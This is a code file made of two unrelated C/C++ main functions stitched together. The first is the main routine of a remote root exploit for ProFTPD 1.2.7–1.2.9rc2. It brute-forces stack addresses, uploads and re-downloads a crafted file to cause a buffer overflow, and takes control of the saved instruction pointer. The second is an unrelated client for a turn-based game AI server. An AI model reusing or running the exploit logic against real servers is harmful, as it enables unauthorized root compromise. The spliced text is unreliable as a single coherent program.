int main(int argc,char **argv)
{
int sleepMode=0;
char c;
unsigned int stackStartAddr=STACK_START;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
switch (c) {
case 't':
server=optarg;
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
sleepMode=1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || localIP==NULL)
usage(argv[0]);
printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis ([email protected])\n");
doris_chroot_breaker();
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
if(check_for_linefeed()==FAILURE)
continue;
retAddr=stackWriteAddr+200; // good enough for show business
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
perror("\n\nFailing to connect to remote host\n");
exit(1);
}
if(login_to_server()==FAILURE) {
close(controlSock);
printf("\nERROR: Login failed.\n");
exit(1);
}
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;
// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();
if(upload_file()==FAILURE)
goto err;
close(controlSock);
// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.
if((controlSock=connect_to_server(ftpPort))<0) {
perror("\nFailed to connect to remote host\n");
exit(1);
}
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;
// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
err:
close(controlSock);
}
// This is only reached if the bruteforce fails.
// delete the exploit files here
printf("\n\nNo r00t for you today I'm afraid.\n");
exit(1);
}
int main(int argc, char** argv)
{
//connect to server, given as the first argument
string usage = string(argv[0]) + " <server> <port> [game #]";
if(argc < 3) {
cerr << usage << endl;
return 0;
}
bool end_game = false;
bool start_game = true;
if(argc == 4) {
// they specified a game number,
// do something different?
start_game = false;
//cout << "Trying to joing game #" << argv[3] << endl;
}
// we got enough command-line arguments,
// start tying to connect:
int sock_server = open_server_connection(argv[1], argv[2]);
if(sock_server == -1) {
return 0;
}
// create an instance of the player's AI class
myAI gameAI;
string comm_buffer;
sexp_t* sexp;
// log into the server, using the AI's team name
string whos_turn;
my_user_id = login_to_server(sock_server, gameAI.PlayerName() );
// setup the logging filename
ostringstream stream;
tm* myTime;
time_t theTime = time(NULL);
myTime = localtime(&theTime);
stream << myTime->tm_hour << "." << myTime->tm_min;
string name = string(argv[0]);
for(int i=name.size()-1; i >=0; i--)
{
if(name[i] == ' ' || name[i] == '/' || name[i] == '\\' || name[i] == '.' || name[i] == ':')
{
name.erase(i,1);
}
}
string log_filename = stream.str() + "-" + name + string(".gamelog");
cout << "Filename: " << log_filename << endl;
#ifdef DEBUG
cout << "DEBUG: logged in as user #" << my_user_id << endl;
#endif
// okay, we've succesfully logged in,
// now start or join a game
if(start_game) {
// create a new game:
string game_number = create_game(sock_server);
gameAI.playerNumber = 1;
gameAI.myBase = coordinate(0,0);
gameAI.enemyBase = coordinate(25,25);
} else {
gameAI.playerNumber = 2;
gameAI.myBase = coordinate(0,0);
gameAI.enemyBase = coordinate(25,25);
// join an existing game
cout << "Trying to join game " << argv[3] << "..." << endl;
string join_string = "(join-game " + string(argv[3]) + ")";
send_string(sock_server, join_string);
sexp = rec_sexp(sock_server);
if(!check_sexp(sexp, "join-accepted")) {
cout << "Unabled to join game " << argv[3] << endl;
goto GAME_SHUTDOWN;
}
// we should only try to start the game if we're the
// player that just joined; otherwise, the server
// will sorta freak out...
send_string(sock_server, "(game-start)");
}
// the server is going to spit a ton of SEXP's at us;
// wade through them until we get a "new-turn" msg.
sexp = rec_sexp(sock_server);
while(!check_sexp(sexp, "new-turn")) {
// okay, what kind of data have we gotten from the server,
// and what are we supposed to do about it?
if(check_sexp(sexp, "game-start-accepted")) {
// the server accepted our reqeust to begin the game;
// we don't care, because earlier we just assumed
// that it worked :|
}
if(check_sexp(sexp, "unit-types")){
// this should be sent only during this initialization:
// it contains the details of each type of unit
#ifdef DEBUG
cout << "DEBUG: updating unit types" << endl;
#endif
update_unit_types((myAI*)&gameAI, sexp);
}
if(check_sexp(sexp, "status")) {
// An actual game-status message: this might not
// mean much right now, but try to parse it anyway.
// Don't bail if it fails, but warn us.
if(!game_status(gameAI, sexp, my_user_id)) {
cout << "WARN: error parsing game status" << endl;
}
}
// get another S-expression to test:
sexp = rec_sexp(sock_server);
}
// okay, now sexp should contain a "new-turn" message
// pull out who's turn it is, then start the main game loop
whos_turn = string(sexp->list->next->val);
#ifdef DEBUG
cout << "DEBUG: got all our pregame stuff, starting main loop!" << endl;
#endif
while(!end_game) {
// ask the server for an update:
//send_string(sock_server, "(game-status)");
//sexp = rec_sexp(sock_server);
// we're not guaranteed to get a "status" message,
// so handle anything unexpected before we get to
// the main game loop
while(!check_sexp(sexp, "status")) {
#ifdef DEBUG
cout << "DEBUG: waiting for game status, got \"" << sexp->list->val << "\" message" << endl;
#endif
if(check_sexp(sexp, "game-over")) {
cout << "Game Over: ";
string winner = string( sexp->list->next->val );
if( winner == my_user_id )
cout << "You Win!";
else
cout << "You Lose...";
cout << endl;
end_game = true;
goto GAME_SHUTDOWN;
}
if(check_sexp(sexp, "new-turn")) {
whos_turn = string(sexp->list->next->val);
#ifdef DEBUG
cout << "DEBUG: It's player " << whos_turn << "'s turn" << endl;
#endif
}
sexp = rec_sexp(sock_server);
}
if(!check_sexp(sexp, "status")) {
cerr << "WARN: expected 'status', got '" << sexp->list->val << "'" << endl;
}
if(!game_status(gameAI, sexp, my_user_id)) {
cerr << "WARN: couldn't parse game status!" << endl;
}
// update the turn number
gameAI.turnNumber = atoi( sexp->list->next->list->val);
if(whos_turn == my_user_id) {
//cout << endl << "Starting my turn... ";
// 4a. Run their custom 'Play()' function
gameAI.Play();
// 4b. Send their orders to the server
while( gameAI.orders.size() != 0){
string myOrder = gameAI.orders.front().s_expression;
gameAI.orders.pop();
// send this command to the server
send_string(sock_server, myOrder);
// there's no need to listen for an incoming message;
// we assume errors will be handled at the beginning
// of the next loop.
}
// let the server know we've finished out turn
send_string(sock_server, "(end-turn)");
//cout << "done with my turn" << endl;
} else {
// it's not your turn, so take it easy for a second
//cout << "Not my turn, waiting...." << endl;
#ifndef WIN32 // the usleep function insn't avaible in Windows
//usleep(100000); // this helps prevent climbing to 100% CPU usage
#endif
}
// get another sexp to jump-start the next iteration of the loop
sexp = rec_sexp(sock_server);
}
GAME_SHUTDOWN:
cout << "Shutting down..." << endl;
send_string(sock_server, "(leave-game)");
sexp = rec_sexp(sock_server);
send_string(sock_server, "(logout)");
sexp = rec_sexp(sock_server);
//End of game
#ifdef WIN32
closesocket(sock_server);
#else
close(sock_server);
#endif
log_file.open(log_filename.c_str());
if(log_file.fail())
{
cout << "Error writing to log file" << endl;
}
else
{
log_file << log_stream.str();
log_file.close();
}
return 0;
}
